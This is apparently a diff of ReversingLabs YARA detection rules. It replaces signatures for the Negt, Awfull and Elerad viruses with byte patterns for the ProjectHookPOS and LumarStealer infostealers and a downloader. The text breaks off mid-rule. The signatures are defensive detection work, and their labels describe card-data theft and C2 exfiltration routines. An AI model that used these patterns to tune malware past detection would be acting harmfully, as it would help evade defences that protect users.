-            00 6A 20 6A 02 6A 00 6A 03 68 00 00 00 C0 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 FF B5 ?? ?? ??
-            ?? FF 95 ?? ?? ?? ?? 2D ?? ?? ?? ?? 6A 00 6A 00 50 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 68 00
-            01 00 00 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 FB 00 74 1E 8D 85 ?? ?? ?? ?? 6A 00
-            50 53 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? EB B7 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
-            FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 C3
+		$download_bin_1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B F2 8B C1 89 85 ??
+            ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ??
+            ?? ?? 83 EC ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 56 C6 01
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84
+            05 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF 50 ?? 8D 4D ?? 51 8B
+            C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B D7 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55
+            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6
+            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ??
+            ?? ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ??
+            ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? B3 ?? EB ?? 32 DB
         }
-		$negt_infector = {
-            E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 00 01 00 00 FF B5 ?? ?? ?? ?? 6A 00 FF 95 ??
-            ?? ?? ?? 6A 00 6A 20 6A 03 6A 00 6A 01 68 00 00 00 80 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 6A 20
-            6A 02 6A 00 6A 03 68 00 00 00 C0 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 FF B5 ?? ?? ?? ?? FF 95
-            ?? ?? ?? ?? 2D ?? ?? ?? ?? 6A 00 6A 00 50 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 68 00 01 00 00
-            FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 FB 00 74 1E 8D 85 ?? ?? ?? ?? 6A 00 50 53 FF
-            B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? EB B7 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ??
-            ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 C3
+		$download_bin_2 = {
+            C7 45 ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 84 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 8D 80 ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03
+            C8 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83
+            C4 ?? 8B 8D ?? ?? ?? ?? 8B F0 85 C9 74 ?? 8B 01 FF 50 ?? 85 C0 74 ?? 8B 10 8B C8 6A
+            ?? FF 12 8B 06 8B CE 6A ?? 8B 40 ?? FF D0 50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 5D ?? 83 C4 ?? 8B 7D ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 75 ?? 8B 75 ?? 8D 4D ??
+            83 FB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F 43 CF 3B F0 0F 42 C6 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 75 ?? 83 FE ?? 73 ?? 83 C8 ?? EB ?? 33 C0 83 FE ?? 0F 95 C0 85 C0 0F 94
+            C0 84 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ??
+            ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 FB ?? 72 ?? 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 EB ?? 8B 8D ?? ?? ??
+            ?? 8B 01 FF 50 ?? 8B 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? C3 8B 85 ?? ??
+            ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5
+            5D C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $negt_infector at pe.entry_point ) or ( ( $negt_body_and_infector_1 at pe.entry_point ) and $negt_body_and_infector_2 and $negt_body_and_infector_3 and $negt_body_and_infector_4 ) )
+		uint16( 0 ) == 0x5A4D and $ping_apnic and $download_bin_1 and $download_bin_2
 }
-
-rule REVERSINGLABS_Win32_Virus_Awfull : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Infostealer_Projecthookpos : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Awfull virus."
+		description = "Yara rule that detects ProjectHookPOS infostealer."
 		author = "ReversingLabs"
-		id = "34104923-b401-5d39-883b-aa9a5a8e64f3"
+		id = "dcb96a99-c8c0-5878-a3a5-fe3cfeec43c6"
 		date = "2020-07-15"
 		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/virus/Win32.Virus.Awfull.yara#L3-L33"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "84a4faee4cbbb3387ad25bd9230c6482b8db461bc008312bc782f23e3df2eae3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/infostealer/Win32.Infostealer.ProjectHookPOS.yara#L1-L98"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b7534c9e905256aaf80f04b746a92c50689437b288f7e393ef13fde1740c4a4e"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Virus"
-		tc_detection_name = "Awfull"
+		tc_detection_type = "Infostealer"
+		tc_detection_name = "ProjectHookPOS"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$awfull_body = {
-              60 E8 ?? 00 00 00 8B 64 24 08 EB ?? [0-256]
-              33 D2 64 FF 32 64 89 22 33 C0 C7 00 00 00 00 00 33 D2 64 8F 02
-              5A 64 (8B 0D | 67 8B 0E ) 14 00 [0-2] E3 03 FA
-              EB FD 61 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 0B ED 74 ??
-              [0-128] (BE | 8B 35) ?? ?? ?? ?? 03 F5 B9 ?? ?? ?? ??
-              56 5F AC F6 D0 AA 49 E3 02 EB F7
+		$calc_luhn = {
+            55 8B EC 83 C4 ?? 53 56 57 33 C9 89 4D ?? 89 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55
+            68 ?? ?? ?? ?? 64 FF 30 64 89 20 C6 45 ?? ?? 33 C0 89 45 ?? 8B 45 ?? 85 C0 74 ?? 8B
+            D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 ??
+            8B 00 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 85 C0 0F 94 C3 8B 45 ?? 85 C0 74 ?? 8B D0
+            83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 ?? 8B
+            00 8B F0 85 F6 7E ?? BF ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B7 54 7A ?? E8 ?? ?? ?? ??
+            8B 45 ?? 83 CA ?? E8 ?? ?? ?? ?? 0F B6 D0 66 83 FA ?? 75 ?? C6 45 ?? ?? EB ?? 84 DB
+            74 ?? 0F B6 C0 0F B6 80 ?? ?? ?? ?? 01 45 ?? EB ?? 0F B6 C0 01 45 ?? 80 F3 ?? 47 4E
+            75 ?? 8B 45 ?? B9 ?? ?? ?? ?? 99 F7 F9 85 D2 75 ?? 80 7D ?? ?? 74 ?? 33 DB EB ?? B3
+            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ??
+            ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B C3 5F 5E 5B 8B E5 5D C3
+        }
+		$track_1_reverse = {
+            55 8B EC 83 C4 ?? 53 56 33 DB 89 5D ?? 8B F1 89 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B C6 33 D2 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ??
+            8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 E8
+            ?? 8B 00 8B D8 83 FB ?? 7C ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? 8B D3 8B 45 ?? E8 ?? ?? ??
+            ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 4B 85 DB 75 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ??
+            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5E 5B 59 59 5D C3
+        }
+		$check_validity_1 = {
+            8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 66 83 38 ?? 75 ??
+            8B 45 ?? 85 C0 74 ?? 8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ??
+            ?? 66 83 78 ?? ?? 0F 94 C0 EB ?? 33 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ??
+            8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 66 83 78 ?? ?? 0F
+            85 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55
+            ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 66 81 78 ?? ?? ?? 73 ?? 0F B6 40 ?? 0F B6 C0 0F A3
+            06 72 ?? 33 C0 EB
+        }
+		$encode_and_send_1 = {
+            64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B F0 8D 4D ?? 8B 55 ?? 8B C7 E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 8B 08 FF 51 ?? 8D 45 ?? 8B 4D ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 55 ?? 8B C3 8B 08 FF 51 ?? 8D 45 ?? 8B 4D ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 55 ?? 8B C3 8B 08 FF 51 ?? 8D 45 ?? 8B 4D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 55 ?? 8B C3 8B 08 FF 51 ?? 8B C6 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            C6 E8 ?? ?? ?? ?? 05 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8B CB BA
+            ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C6 E8
+        }
+		$form_create_1 = {
+            8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45
+            ?? E8 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 55
+            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8
+            ?? ?? ?? ?? 50 8D 55 ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 84 C0 0F 84
+        }
+		$form_create_2 = {
+            33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B C3 E8 ?? ?? ?? ?? 05 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 55 ??
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B C3 E8
+        }
+		$form_create_3 = {
+            B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 33 C9
+            BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ??
+            8B 4D ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 33 C9 BA ?? ?? ??
+            ?? 8B C3 E8 ?? ?? ?? ?? 33 C9 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ??
+            ?? 8B C3 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 09 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            A3 ?? ?? ?? ?? BA ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 84
+            C0 74
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $awfull_body at pe.entry_point )
+		uint16( 0 ) == 0x5A4D and ( $calc_luhn and $track_1_reverse and $check_validity_1 and $encode_and_send_1 and $form_create_1 and $form_create_2 and $form_create_3 )
 }
-
-rule REVERSINGLABS_Win32_Virus_Elerad : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Infostealer_Lumarstealer : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Elerad virus."
+		description = "Yara rule that detects LumarStealer infostealer."
 		author = "ReversingLabs"
-		id = "0307a136-ea2c-584c-bfda-f41e2c46fd09"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "a1358846-7cc2-53ac-89a9-c6c99f492284"
+		date = "2023-12-07"
+		modified = "2023-12-07"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/virus/Win32.Virus.Elerad.yara#L3-L33"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "930594bf99daf55ef02542ce7b393c1c23ead75946b3da3b555102a2e7142e33"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/infostealer/Win32.Infostealer.LumarStealer.yara#L1-L190"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0bc9e12396b1e85f69b965e9ea50960c59c50aba40317fb4de8f6abd092ec7d2"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Virus"
-		tc_detection_name = "Elerad"
+		tc_detection_type = "Infostealer"
+		tc_detection_name = "LumarStealer"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$elerad_body = {
-            EB 77 60 E8 09 00 00 00 8B 64 24 08 E9 DD 01 00 00 33 D2 64 FF 32 64 89 22 50 8B D8 B9 FF 00 00 00 81 38 2E 65 78 65 74
-            08 40 E2 F5 E9 BD 01 00 00 32 D2 38 50 04 0F 85 B2 01 00 00 33 D2 80 38 5C 74 07 3B C3 74 07 48 E2 F4 88 10 8B D0 58 BE
-            00 00 E6 77 BF 23 C1 AB 00 EB 3E 60 E8 09 00 00 00 8B 64 24 08 E9 84 01 00 00 33 D2 64 FF 32 64 89 22 BE 00 00 E6 77 EB
-            20 68 ?? ?? ?? ?? 60 8B 74 24 24 E8 09 00 00 00 8B 64 24 08 E9 5D 01 00 00 33 D2 64 FF 32 64 89 22 E8 00 00 00 00 5D 81
-            ED ?? ?? ?? ?? 81 FF 23 C1 AB 00 75 0C 89 95 22 12 40 00 89 85 1E 12 40 00 BA ?? ?? ?? ?? B9 09 02 00 00 8D 85 D0 10 40
-            00 31 10 83 C0 04 E2 F9
+		$collect_os_information_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 B8 ?? ?? ?? ?? C1 E0 ?? 8B 88 ?? ?? ?? ?? FF D1 66
+            A3 ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ??
+            66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66
+            89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89
+            4D ?? BA ?? ?? ?? ?? 66 89 55 ?? C6 45 ?? ?? EB ?? 8A 45 ?? 04 ?? 88 45 ?? 0F B6 4D
+            ?? 83 F9 ?? 73 ?? 0F B6 55 ?? 0F B7 44 55 ?? 0F B7 0D ?? ?? ?? ?? 3B C1 75 ?? FF 25
+            ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? 89 55 ?? 89 55 ?? C7 45 ?? ??
+            ?? ?? ?? 8D 75 ?? B8 ?? ?? ?? ?? 33 C9 0F A2 89 06 89 5E ?? 89 4E ?? 89 56 ?? B8 ??
+            ?? ?? ?? 6B C8 ?? 8B 54 0D ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ??
+            89 45 ?? 8B 4D ?? 3B 4D ?? 77 ?? 8D 75 ?? 8B 45 ?? 33 C9 0F A2 89 06 89 5E ?? 89 4E
+            ?? 89 56 ?? 81 7D ?? ?? ?? ?? ?? 75 ?? 6A ?? 8D 55 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? EB ?? 81 7D ?? ?? ?? ?? ?? 75 ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? EB ?? 81 7D ?? ?? ?? ?? ?? 75 ?? 6A ?? 8D 4D ?? 51 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 80 ?? ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? 52 B8 ?? ?? ?? ?? C1 E0 ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74
+            ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
+            ?? 50 B9 ?? ?? ?? ?? D1 E1 8B 91 ?? ?? ?? ?? FF D2 8B 45 ?? A3 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A ?? 6A ?? BA ?? ?? ?? ?? 6B C2
+        }
+		$collect_os_information_p2 = {
+            8B 88 ?? ?? ?? ?? FF D1 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? 6B D1 ?? 8B 82 ?? ?? ?? ?? FF
+            D0 85 C0 74 ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? A3 ?? ??
+            ?? ?? 89 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ??
+            FF 15 ?? ?? ?? ?? 89 45 ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? 51
+            6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? A3 ?? ?? ?? ?? 8B 4D ?? 89
+            0D ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 6A ?? B9 ?? ?? ?? ?? C1 E1 ?? 8B 91 ?? ?? ?? ?? FF D2 C7 45 ?? ?? ?? ??
+            ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 83 7D ?? ?? 73 ?? 8B 4D ?? 83 C1 ?? 89 4D ?? EB
+            ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 83 7D ?? ?? 73 ?? 8B 45 ?? 0F B7 0C 45 ?? ?? ?? ?? 8B
+            55 ?? 0F B7 04 55 ?? ?? ?? ?? 3B C8 75 ?? 33 C9 8B 55 ?? 66 89 0C 55 ?? ?? ?? ?? EB
+            ?? EB ?? 5E 5B 8B E5 5D C3
+        }
+		$send_data_to_c2_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B D1
+            ?? 8B 82 ?? ?? ?? ?? FF D0 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 4D ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 66 89 45 ?? 6A ?? 6A ?? 0F BF 55 ?? 52 B8 ?? ?? ??
+            ?? C1 E0 ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A
+            ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ??
+            ?? ?? ?? EB ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 83 7D ?? ?? 7D ?? 8B 45 ?? 0F B7 8C 45 ??
+            ?? ?? ?? 83 F9 ?? 75 ?? 8B 55 ?? 0F B7 84 55 ?? ?? ?? ?? 83 F8 ?? 75 ?? EB ?? EB ??
